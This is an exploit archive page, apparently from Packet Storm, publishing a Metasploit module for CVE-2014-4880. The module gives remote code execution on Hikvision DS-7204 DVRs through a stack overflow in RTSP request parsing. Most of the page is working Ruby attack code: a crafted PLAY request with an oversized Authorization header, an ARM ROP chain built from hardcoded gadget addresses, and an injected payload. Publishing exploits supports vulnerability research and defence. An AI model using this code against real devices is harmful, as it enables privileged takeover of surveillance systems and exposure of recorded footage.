what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Hikvision DVR RTSP Request Remote Code Execution

Hikvision DVR RTSP Request Remote Code Execution
Posted Nov 20, 2014
Authored by Mark Schloesser | Site metasploit.com

This Metasploit module exploits a buffer overflow in the RTSP request parsing code of Hikvision DVR appliances. The Hikvision DVR devices record video feeds of surveillance cameras and offer remote administration and playback of recorded footage. The vulnerability is present in several models / firmware versions but due to the available test device this module only supports the DS-7204 model.

tags | exploit, remote, overflow
advisories | CVE-2014-4880
SHA-256 | 6b2b9a85fb38d16071b6b342c045ffee4f7eec319cde44c45f5692a33a084002

Hikvision DVR RTSP Request Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking

include Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Hikvision DVR RTSP Request Remote Code Execution',
'Description' => %q{
This module exploits a buffer overflow in the RTSP request parsing
code of Hikvision DVR appliances. The Hikvision DVR devices record
video feeds of surveillance cameras and offer remote administration
and playback of recorded footage.

The vulnerability is present in several models / firmware versions
but due to the available test device this module only supports
the DS-7204 model.
},
'Author' =>
[
'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-4880' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities' ]
],
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Privileged' => true,
'Targets' =>
[
#
# ROP targets are difficult to represent in the hash, use callbacks instead
#
[ "DS-7204 Firmware V2.2.10 build 131009", {

# The callback handles all target-specific settings
:callback => :target_ds7204_1,
'g_adjustesp' => 0x002c828c,
# ADD SP, SP, #0x350
# LDMFD SP!, {R4-R6,PC}

'g_r3fromsp' => 0x00446f80,
# ADD R3, SP, #0x60+var_58
# BLX R6

'g_blxr3_pop' => 0x00456360,
# BLX R3
# LDMFD SP!, {R1-R7,PC}

'g_popr3' => 0x0000fe98,
# LDMFD SP!, {R3,PC}
} ],

[ "Debug Target", {

# The callback handles all target-specific settings
:callback => :target_debug

} ]

],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 19 2014'))

register_options(
[
Opt::RPORT(554)
], self.class)
end

def exploit
unless self.respond_to?(target[:callback])
fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")
end

device_rop = self.send(target[:callback])

request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"
request << "CSeq: 7\r\n"
request << "Authorization: Basic "
request << rand_text_alpha(0x280 + 34)
request << [target["g_adjustesp"]].pack("V")[0..2]
request << "\r\n\r\n"
request << rand_text_alpha(19)

# now append the ropchain
request << device_rop
request << rand_text_alpha(8)
request << payload.encoded

connect
sock.put(request)
disconnect
end

# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
def target_ds7204_1
# Create a fixed-size buffer for the rop chain
ropbuf = rand_text_alpha(24)

# CHAIN = [
# 0, #R4 pop adjustsp
# 0, #R5 pop adjustsp
# GADGET_BLXR3_POP, #R6 pop adjustsp
# GADGET_POPR3,
# 0, #R3 pop
# GADGET_R3FROMSP,
# ]

ropbuf[8,4] = [target["g_blxr3_pop"]].pack("V")
ropbuf[12,4] = [target["g_popr3"]].pack("V")
ropbuf[20,4] = [target["g_r3fromsp"]].pack("V")

return ropbuf
end

# Generate a buffer that provides a starting point for exploit development
def target_debug
Rex::Text.pattern_create(2000)
end

def rhost
datastore['RHOST']
end

def rport
datastore['RPORT']
end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    0 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close